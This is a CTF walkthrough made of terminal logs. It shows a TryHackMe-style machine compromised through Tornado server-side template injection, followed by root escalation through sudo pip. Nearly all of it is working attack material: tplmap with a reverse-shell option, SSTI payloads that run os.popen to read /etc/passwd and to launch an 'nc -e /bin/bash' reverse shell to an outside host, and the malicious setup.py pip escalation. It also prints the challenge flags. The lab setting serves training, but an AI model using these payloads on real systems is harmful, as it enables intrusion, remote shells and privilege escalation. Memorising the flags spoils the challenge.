┌──(env)─(kali㉿kali)-[~/noname_ctf/tplmap]
└─$ ./tplmap.py -u http://10.10.163.81:9090/40b5dffec4e39b7a3e9d261d2fc4a038/?hackme= --reverse-shell 10.8.19.103 1337
[+] Tplmap 0.5
Automatic Server-Side Template Injection Detection and Exploitation Tool
[+] Testing if GET parameter 'hackme' is injectable
[+] Smarty plugin is testing rendering with tag '*'
[+] Smarty plugin is testing blind injection
[+] Mako plugin is testing rendering with tag '${*}'
[+] Mako plugin is testing blind injection
[+] Python plugin is testing rendering with tag 'str(*)'
[+] Python plugin is testing blind injection
[+] Tornado plugin is testing rendering with tag '{{*}}'
[+] Tornado plugin has detected unreliable rendering with tag '{{*}}', skipping
[+] Tornado plugin is testing blind injection
[+] Tornado plugin has confirmed blind injection
[+] Tplmap identified the following injection point:
GET parameter: hackme
Engine: Tornado
Injection: *
Context: text
OS: undetected
Technique: blind
Capabilities:
Shell command execution: ok (blind)
Bind and reverse shell: ok
File write: ok (blind)
File read: no
Code evaluation: ok, python code (blind)
[-][tcpserver] Port bind on 0.0.0.0:1337 has failed: [Errno 98] Address already in use
┌──(kali㉿kali)-[~/Downloads]
└─$ rlwrap nc -lvnp 1337
Ncat: Version 7.93 ( https://nmap.org/ncat )
Ncat: Listening on :::1337
Ncat: Listening on 0.0.0.0:1337
Ncat: Connection from 10.10.163.81.
Ncat: Connection from 10.10.163.81:37710.
/bin/sh: 0: can't access tty; job control turned off
$ whoami
zeldris
$ ls
server.py
$ cat server.py
import tornado.template
import tornado.ioloop
import tornado.web
TEMPLATE = '''
<html>
<head><title> Hello {{ name }} </title></head>
<body><section class="inside"><h2>Cyber Security training made easy</h2></br>Hello FOO <p class='m0'>TryHackMe takes the pain out of learning and teaching Cybersecurity. Our platform makes it a comfortable experience to learn by designing prebuilt courses which include virtual machines (VM) hosted in the cloud ready to be deployed. This avoids the hassle of downloading and configuring VM's. Our platform is perfect for CTFs, Workshops, Assessments or Training.</p></section></section></div><div class="container main pb"><section class="row"><div class="col-md-4 green-hover"><h2><i class="fas fa-spider"></i> Hack Instantly</h2><p>Learn, practice and complete! Get hands on and practise your skills in a real-world environment by completing fun and difficult tasks. You can deploy VMs, which will give an IP address instantly and away you go.</p></div><div class="col-md-4 green-hover"><h2><i class="fas fa-door-closed"></i> Rooms</h2><p>Rooms are virtual areas dedicated to particular cyber security topics. For example, a room called "Hacking the Web" could be dedicated to web application vulnerabilities. </p></div><div class="col-md-4 green-hover"><h2><i class="fab fa-fort-awesome"></i> Tasks</h2><p>Each room has tasks that contain questions and hints, a custom leaderboard and chat area. Whilst you're hacking away, you can discuss hacking techniques or request help from others.</p><!-- ?hackme= --></div></section>
</body>
</html>
'''
class MainHandler(tornado.web.RequestHandler):
def get(self):
name = self.get_argument('hackme', '')
template_data = TEMPLATE.replace("FOO",name)
t = tornado.template.Template(template_data)
self.write(t.generate(name=name))
application = tornado.web.Application([
(r"/40b5dffec4e39b7a3e9d261d2fc4a038/", MainHandler),
], debug=True, static_path=None, template_path=None)
if __name__ == '__main__':
application.listen(9090)
tornado.ioloop.IOLoop.instance().start()
$ pwd
/home/zeldris/nonamectf/ssti
$ cd ..
$ ls
run.sh
ssti
tryhackme
$ cat run.sh
#!/bin/bash
socat TCP-LISTEN:2222,reuseaddr,fork EXEC:./tryhackme,pty,stderr,echo=0
$ cd ..
$ ls
nonamectf
user.txt
$ cat user.txt
THM{SSTI_AND_BUFFER_OVERFLOW_W4S_HERE}
priv esc
https://gtfobins.github.io/gtfobins/pip/
$ sudo -l
Matching Defaults entries for zeldris on ubuntu:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User zeldris may run the following commands on ubuntu:
(ALL : ALL) ALL
(root : root) NOPASSWD: /usr/bin/pip install *
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
zeldris@ubuntu:/tmp$ TF=$(mktemp -d)
TF=$(mktemp -d)
zeldris@ubuntu:/tmp$ echo "import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')" > $TF/setup.py
<sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')" > $TF/setup.py
zeldris@ubuntu:/tmp$ sudo pip install $TF
sudo pip install $TF
The directory '/home/zeldris/.cache/pip/http' or its parent directory is not owned by the current user and the cache has been disabled. Please check the permissions and owner of that directory. If executing pip with sudo, you may want sudo's -H flag.
The directory '/home/zeldris/.cache/pip' or its parent directory is not owned by the current user and caching wheels has been disabled. check the permissions and owner of that directory. If executing pip with sudo, you may want sudo's -H flag.
Processing ./tmp.AiMqJEpCCo
# whoami
whoami
root
# cd /root
cd /root
# ls
ls
root.txt ufw
# cat root.txt
cat root.txt
THN{F4KE_PIP_PACKAGE_INSTALL}
# cd ufw
cd ufw
# ls
ls
ufw.sh
# cat ufw.sh
cat ufw.sh
ufw disable
or doing manually
http://10.10.55.71:9090/40b5dffec4e39b7a3e9d261d2fc4a038/?hackme={{%20%27%27.__class__.__mro__[1].__subclasses__()%20}}
It is attempting to access the subclasses of the superclass of the empty string ('') by chaining together multiple attributes and methods. Specifically, it is calling the **class** attribute of an empty string, which returns the class object, then the **mro** attribute of that class object, which returns the method resolution order, and then the **subclasses** method of the first item of that method resolution order.
This payload is attempting to exploit a vulnerability in the application by accessing classes
Hello [<class 'property'>, <class 'str'>, <class 'inspect._empty'>, _ForwardRef('HTTPFile'), <class '_frozen_importlib.BuiltinImporter'>, typing.Generic<+T_co>, <class 'asyncio.subprocess.Process'>, <class 'hmac.HMAC'>, <class 'logging.PlaceHolder'>, <class '_ssl._SSLSocket'>, <class 'dict_valueiterator'>, <class 'concurrent.futures._base._AcquireFutures'>, <class 'itertools.zip_longest'>, <class 'itertools.takewhile'>, <class 'threading.Semaphore'>, <class '_weakrefset.WeakSet'>, <class 'bytearray_iterator'>, <class 'classmethod'>, <class 'range_iterator'>, <class 'callable_iterator'>, <class 'concurrent.futures._base.Future'>, <class 'importlib.abc.Loader'>, <class '_frozen_importlib_external.FileFinder'>, <class 'tornado.gen.Runner'>, <class 'string.Template'>, <class 'collections.abc.Sized'>, <class 'csv.Dialect'>, <class 'logging.Formatter'>, <class '_frozen_importlib._ModuleLock'>, <class 'itertools._tee'>, <class 'cell'>, <class 'ipaddress._BaseV6'>, <class 'codecs.IncrementalEncoder'>, <class 'asyncio.futures._TracebackLogger'>, <class 'ssl.SSLObject'>, <class '_frozen_importlib_external.PathFinder'>, <class 'email._policybase._PolicyBase'>, <class 'collections.abc.AsyncIterable'>, <class 'frozenset'>, <class 'PyCapsule'>, <class 'managedbuffer'>, <class 'sre_parse.Pattern'>, <class 'pickle._Framer'>, <class 'iterator'>, <class '_bz2.BZ2Compressor'>, <class 'staticmethod'>, _ForwardRef('Matcher'), <enum 'Enum'>, <class 'coroutine_wrapper'>, <class '_frozen_importlib._installed_safely'>, <class 'datetime.time'>, <class 'select.epoll'>, <class '_pickle.UnpicklerMemoProxy'>, <class 'tornado.httputil.HTTPConnection'>, _ForwardRef('OutputTransform'), <class 'logging.PercentStyle'>, <class 'builtin_function_or_method'>, <class 'float'>, <class 'EncodingMap'>, <class '_sitebuiltins.Quitter'>, <class 'dict_keys'>, <class 'threading.Event'>, <class 'tornado.locale.Locale'>, <class 'itertools.permutations'>, <class 'tarfile._LowLevelFile'>, <class 'itertools.combinations_with_replacement'>, <class 'list_reverseiterator'>, <class 'tornado.template._TemplateReader'>, <class 'pkgutil.ImpImporter'>, <class '_collections._deque_iterator'>, <class 'ipaddress._IPAddressBase'>, <class 'json.encoder.JSONEncoder'>, <class 'int'>, <class 'itertools.chain'>, _ForwardRef('RequestStartLine'), <class '_sre.SRE_Pattern'>, <class 'json.decoder.JSONDecoder'>, <class 'itertools.islice'>, <class 'zlib.Decompress'>, <class 'tornado.web.RequestHandler'>, <class '_frozen_importlib._ManageReload'>, <class 'weakref.finalize._Info'>, <class 'csv.DictWriter'>, _ForwardRef('Optional[Type[BaseException]]'), <class 'tornado.template._CodeWriter.indent.<locals>.Indenter'>, <class '_frozen_importlib_external._NamespaceLoader'>, <class 'tornado.iostream.BaseIOStream'>, <class 'csv.Sniffer'>, <class 'ellipsis'>, <class 'tornado.ioloop._Selectable'>, _ForwardRef('BaseLoader'), <class 'numbers.Number'>, _ForwardRef('Resolver'), <class 'multiprocessing.connection.SocketListener'>, <class 'threading.Thread'>, _ForwardRef('IOLoop'), <class 'email.feedparser.BufferedSubFile'>, <class 'tornado.util.GzipDecompressor'>, <class 'tornado.template._CodeWriter'>, <class 'asyncio.events.AbstractEventLoop'>, <class 'itertools.count'>, <class '_collections._deque_reverse_iterator'>, <class 'itertools.groupby'>, <class 'itertools.starmap'>, <class 'itertools.accumulate'>, <class '_lzma.LZMACompressor'>, <class 'urllib.parse._NetlocResultMixinBase'>, <class 'asyncio.streams.StreamWriter'>, <class 'unicodedata.UCD'>, <class 'tornado.httputil.HTTPServerRequest'>, <class 'contextlib.ContextDecorator'>, <class 'calendar.Calendar'>, <class 'concurrent.futures.process._WorkItem'>, <class 'super'>, <class 'tornado.util.ArgReplacer'>, <class 'tornado.ioloop._Timeout'>, <class 'itertools._grouper'>, <class 'http.client.HTTPConnection'>, <class '_curses.curses window'>, <class 'contextlib.closing'>, <class 'typing.re'>, <class 'classmethod_descriptor'>, <class 'complex'>, <class 'traceback'>, <class 'weakcallableproxy'>, <class 'tornado.ioloop.PeriodicCallback'>, <class 'asyncio.events.AbstractEventLoopPolicy'>, <class 'importlib.abc.Finder'>, <class 'tornado.web._UIModuleNamespace'>, <class 'calendar._localized_day'>, <class 'collections.abc.Iterable'>, <class 'inspect.Signature'>, <class 'tarfile._Stream'>, _ForwardRef('Matcher'), <class 'dict_items'>, <class '_thread.RLock'>, <class 'NotImplementedType'>, <class 'dict_values'>, <class 'inspect._void'>, <class 'codecs.StreamReaderWriter'>, <class 'concurrent.futures._base._Waiter'>, <class 'threading._RLock'>, typing._Protocol<+T_co>, <class 'os._wrap_close'>, <class 'tornado.tcpserver.TCPServer'>, <class 'tornado.template.BaseLoader'>, <class 'datetime.timedelta'>, <class 'itertools._tee_dataobject'>, <class '_pickle.PicklerMemoProxy'>, <class 'tornado.web.OutputTransform'>, <class 'email.charset.Charset'>, <class '_frozen_importlib.ModuleSpec'>, <class 'asyncio.unix_events.AbstractChildWatcher'>, <class 'ast.NodeVisitor'>, typing._Protocol<+T_co>, <class '_sitebuiltins._Helper'>, <class 'dict_keyiterator'>, <class '_io._IOBase'>, <class 'queue.Queue'>, <class 'warnings.catch_warnings'>, <class 'tempfile.SpooledTemporaryFile'>, <class 'select.poll'>, <class 'bytes_iterator'>, <class 'logging.LogRecord'>, <class 'list'>, <class '_lzma.LZMADecompressor'>, <class 'email.header.Header'>, <class 'multiprocessing.process.BaseProcess'>, <class 'multiprocessing.connection.Listener'>, <class 'concurrent.futures.process._CallItem'>, <class 'multiprocessing.context.BaseContext'>, _ForwardRef('Future[_T]'), typing.Generic<+T_co>, <class 'zlib.Compress'>, <class 'tornado.gen._NullFuture'>, _ForwardRef('Return'), <class 'tuple'>, _ForwardRef('_Node'), typing.Generic<+T_co, -T_contra, +V_co>, <class 'inspect.BlockFinder'>, <class 'posix.ScandirIterator'>, <class 'multiprocessing.connection._ConnectionBase'>, <class 'tornado.httputil.HTTPMessageDelegate'>, <class 'frame'>, <class 'tempfile._TemporaryFileWrapper'>, <class 'array.array'>, <class 'asyncio.sslproto._SSLPipe'>, <class 'typing.io'>, <class '_ssl._SSLContext'>, <class 'itertools.product'>, <class 'itertools.repeat'>, <class 'itertools.compress'>, <class 'subprocess.Popen'>, _ForwardRef('OutputTransform'), <class 'pickle._Pickler'>, <class 'threading.Barrier'>, <class 'asyncio.events.AbstractServer'>, _ForwardRef('UIModule'), _ForwardRef('_NamedBlock'), <class '_sre.SRE_Scanner'>, <class 'tempfile._TemporaryFileCloser'>, <class 'tempfile.TemporaryDirectory'>, <class 'map'>, <class 'email.parser.BytesParser'>, _ForwardRef('_Node'), <class 'ipaddress._IPv4Constants'>, <class 'operator.itemgetter'>, <class 'textwrap.TextWrapper'>, <class 'collections.abc.Hashable'>, <class '_csv.reader'>, <class '_frozen_importlib_external._NamespacePath'>, <class 'Struct'>, <class 'asyncio.events.Handle'>, <class 'method_descriptor'>, <class 'code'>, <class 'concurrent.futures.thread._WorkItem'>, <class 'posix.DirEntry'>, <class 'zipimport.zipimporter'>, <class '_pickle.Pickler'>, <class 'typing._TypeAlias'>, <class 'multiprocessing.connection.ConnectionWrapper'>, <class 'email._parseaddr.AddrlistClass'>, _ForwardRef('Rule'), <class 'range'>, <class 'module'>, <class 'asyncio.coroutines.CoroWrapper'>, <class 'tornado.template._CodeWriter.indent.<locals>.Indenter'>, <class '_frozen_importlib._ImportLockContext'>, _ForwardRef('ResponseStartLine'), <class '_csv.Dialect'>, <class 'formatteriterator'>, <class 'weakref.finalize'>, _ForwardRef('_Node'), <class 'pickle._Unpickler'>, _ForwardRef('ResponseStartLine'), <class 'traceback.TracebackException'>, _ForwardRef('Resolver'), <class 'selectors.BaseSelector'>, <class 'tornado.httpserver._HTTPRequestContext'>, <class 'codecs.StreamRecoder'>, <class 'tornado.gen.WaitIterator'>, <class '_pickle.Pdata'>, <class 'reversed'>, <class '_json.Scanner'>, <class 'codecs.Codec'>, _ForwardRef('RequestStartLine'), <class '_frozen_importlib._DummyModuleLock'>, <class 'email.header._ValueFormatter'>, <class '_json.Encoder'>, <class 'concurrent.futures._base.Executor'>, typing._Protocol, <class 'gzip._PaddedFile'>, <class 'asyncio.queues.Queue'>, <class 'datetime.date'>, _ForwardRef('OutputTransform'), <class 'ipaddress._BaseV4'>, <class '_frozen_importlib.FrozenImporter'>, <class 'tornado.routing.Matcher'>, <class 'tornado.iostream._StreamBuffer'>, <class 'tarfile.TarIter'>, <class 'tornado.template._UnsetMarker'>, _ForwardRef('SSLIOStream'), <class 'inspect.BoundArguments'>, <class 'tornado.http1connection.HTTP1ConnectionParameters'>, <class '_ssl.MemoryBIO'>, <class '_hashlib.HASH'>, <class 'os._DummyDirEntry'>, <class 'sre_parse.SubPattern'>, typing.Generic, typing.Generic<~AnyStr>, <class 'function'>, <class 'itertools.cycle'>, <class 'string.Formatter'>, <class 'asyncio.locks._ContextManagerMixin'>, <class 'odict_iterator'>, <class 'mimetypes.MimeTypes'>, <class '_sre.SRE_Match'>, <class 'email.message.Message'>, <class 'abc.ABC'>, <class 'tornado.process.Subprocess'>, <class '_thread._local'>, <class 'collections.abc.Callable'>, <class '_frozen_importlib_external._LoaderBasics'>, <class 'functools.partialmethod'>, <class 'tornado.util.Configurable'>, <class 'type'>, <class 'warnings.WarningMessage'>, <class '_random.Random'>, <class 'operator.attrgetter'>, <class 'operator.methodcaller'>, _ForwardRef('_NamedBlock'), <class 'instancemethod'>, <class 'zip'>, <class 'weakref'>, <class 'pickle._Unframer'>, <class 'concurrent.futures.process._ResultItem'>, <class 'multiprocessing.util.Finalize'>, <class 're.Scanner'>, <class 'tornado.http1connection.HTTP1ServerConnection'>, typing.Generic<~KT, +VT_co>, <class '_weakrefset._IterationGuard'>, <class 'slice'>, <class 'longrange_iterator'>, <class 'moduledef'>, <class '_bz2.BZ2Decompressor'>, <class 'calendar._localized_month'>, <class 'tokenize.Untokenizer'>, <class 'tornado.template.Template'>, <class '_sitebuiltins._Printer'>, <class 'contextlib.ExitStack'>, _ForwardRef('_Node'), <class '_pickle.Unpickler'>, <class 'coroutine'>, <class '_thread.lock'>, <class 'tornado.web._ArgDefaultMarker'>, <class 'inspect.Parameter'>, typing.Generic<+CT>, <class 'gettext.NullTranslations'>, <class 'dict_itemiterator'>, _ForwardRef('Future[_T]'), <class 'tornado.template._Node'>, <class 'email.feedparser.FeedParser'>, <class 'multiprocessing.reduction._C'>, <class 'dict'>, <class 'tuple_iterator'>, <class 'member_descriptor'>, <class '_socket.socket'>, <class 'pkgutil.ImpLoader'>, <class 'asyncio.locks.Event'>, <class 'tornado.template._CodeWriter.indent.<locals>.Indenter'>, <class 'collections.abc.Container'>, <class 'weakproxy'>, typing.Generic<+T_co>, <class 'csv.DictReader'>, <class 'logging.LoggerAdapter'>, <class 'multiprocessing.util.ForkAwareThreadLock'>, <class '_frozen_importlib._ModuleLockManager'>, _ForwardRef('Generator[Any, Any, _T]'), <class 'mappingproxy'>, <class '_multiprocessing.SemLock'>, _ForwardRef('Matcher'), <class 'dis.Bytecode'>, <class 'logging.handlers.QueueListener'>, _ForwardRef('_File'), <class 'tarfile.TarFile'>, _ForwardRef('_Node'), <class 'tornado.http1connection._ExceptionLoggingContext'>, <class 'types._GeneratorWrapper'>, <class 'traceback.FrameSummary'>, <class 'concurrent.futures.process._ExceptionWithTraceback'>, <class 'set'>, <class 'itertools.combinations'>, <class 'collections.deque'>, <class 'itertools.dropwhile'>, <class 'itertools.filterfalse'>, typing._Protocol<+T_co>, <class 'sre_parse.Tokenizer'>, <class '_frozen_importlib_external.FileLoader'>, <class 'bytes'>, <class 'tornado.web.UIModule'>, <class 'tarfile.TarInfo'>, <class 'tornado.routing.Rule'>, <class 'contextlib._RedirectStream'>, <class 'typing.Final'>, <class 'bytearray'>, <class 'filter'>, <class 'NoneType'>, <class 'functools.partial'>, <class 'tornado.httputil.HTTPServerConnectionDelegate'>, <class 'urllib.parse._ResultMixinStr'>, <class '_frozen_importlib_external.WindowsRegistryFinder'>, <class 'getset_descriptor'>, <class 'method-wrapper'>, <class 'method'>, <class 'subprocess.CompletedProcess'>, <class 'str_iterator'>, <class 'logging.Manager'>, <class 'tempfile._RandomNameSequence'>, <class 'logging.Filter'>, <class '_csv.writer'>, <class '_thread._localdummy'>, <class '_io._BytesIOBuffer'>, <class 'set_iterator'>, <class 'asyncio.locks._ContextManager'>, <class 'memoryview'>, <class 'generator'>, typing.Generic<+T_co>, <class 'asyncio.transports.BaseTransport'>, <class 'asyncio.futures.Future'>, <class 'urllib.parse._ResultMixinBytes'>, <class '_ast.AST'>, <class 'reprlib.Repr'>, <class 'fieldnameiterator'>, <class 'enumerate'>, <class 'datetime.tzinfo'>, <class 'asyncio.protocols.BaseProtocol'>, <class 'copy._EmptyClass'>, <class '_io.IncrementalNewlineDecoder'>, <class 'BaseException'>, <class 'types.SimpleNamespace'>, _ForwardRef('IOStream'), <class 'functools._lru_cache_wrapper'>, <class 'collections.abc.Awaitable'>, <class 'asyncio.streams.StreamReader'>, <class 'calendar.different_locale'>, <class 'logging.Filterer'>, <class 'contextlib.suppress'>, <class 'wrapper_descriptor'>, <class 'types.DynamicClassAttribute'>, <class 'codecs.IncrementalDecoder'>, <class 'ipaddress._IPv6Constants'>, <class 'list_iterator'>, <class 'stderrprinter'>, _ForwardRef('BaseLoader'), <class 'email.parser.Parser'>, <class 'threading.Condition'>, <class 'tarfile._FileInFile'>, <class 'tarfile._StreamProxy'>, <class 'collections._Link'>, <class 'logging.BufferingFormatter'>, typing.Generic<~KT, +VT_co>]
http://10.10.55.71:9090/40b5dffec4e39b7a3e9d261d2fc4a038/?hackme={%%20import%20os%20%}{{%20os.popen(%22cat%20/etc/passwd%22).read()%20}}
Hello root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false syslog:x:104:108::/home/syslog:/bin/false _apt:x:105:65534::/nonexistent:/bin/false messagebus:x:106:110::/var/run/dbus:/bin/false uuidd:x:107:111::/run/uuidd:/bin/false zeldris:x:1000:1000:NoNameCTF2,,,:/home/zeldris:/bin/bash sshd:x:108:65534::/var/run/sshd:/usr/sbin/nologin
http://10.10.55.71:9090/40b5dffec4e39b7a3e9d261d2fc4a038/?hackme={%%20import%20os%20%}{{%20os.popen(%22cat%20/home/zeldris/user.txt%22).read()%20}}
Hello THM{SSTI_AND_BUFFER_OVERFLOW_W4S_HERE}
http://10.10.55.71:9090/40b5dffec4e39b7a3e9d261d2fc4a038/?hackme={%%20import%20os%20%}{{%20os.popen(%22nc%2010.8.19.103%201337%20-e%20/bin/bash%22).read()%20}}
┌──(kali㉿kali)-[~/Downloads]
└─$ rlwrap nc -lvnp 1337
Ncat: Version 7.93 ( https://nmap.org/ncat )
Ncat: Listening on :::1337
Ncat: Listening on 0.0.0.0:1337
Ncat: Connection from 10.10.55.71.
Ncat: Connection from 10.10.55.71:34786.
whoami
zeldris
python3 -c 'import pty;pty.spawn("/bin/bash")'
zeldris@ubuntu:~/nonamectf/ssti$ sudo -l
sudo -l
Matching Defaults entries for zeldris on ubuntu:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User zeldris may run the following commands on ubuntu:
(ALL : ALL) ALL
(root : root) NOPASSWD: /usr/bin/pip install *
zeldris@ubuntu:~/nonamectf/ssti$ TF=$(mktemp -d)
TF=$(mktemp -d)
zeldris@ubuntu:~/nonamectf/ssti$ echo "import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')" > $TF/setup.py
<execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')" > $TF/setup.py
zeldris@ubuntu:~/nonamectf/ssti$ sudo pip install $TF
sudo pip install $TF
The directory '/home/zeldris/.cache/pip/http' or its parent directory is not owned by the current user and the cache has been disabled. Please check the permissions and owner of that directory. If executing pip with sudo, you may want sudo's -H flag.
The directory '/home/zeldris/.cache/pip' or its parent directory is not owned by the current user and caching wheels has been disabled. check the permissions and owner of that directory. If executing pip with sudo, you may want sudo's -H flag.
Processing /tmp/tmp.D25ysNM6jY
# whoami
whoami
root
# cat /root/root.txt
cat /root/root.txt
THN{F4KE_PIP_PACKAGE_INSTALL}
:)
Compromise this machine and obtain user.txt
THM{SSTI_AND_BUFFER_OVERFLOW_W4S_HERE}
Escalate privileges and obtain root.txt
THN{F4KE_PIP_PACKAGE_INSTALL}
[[Binex]]
Last updated
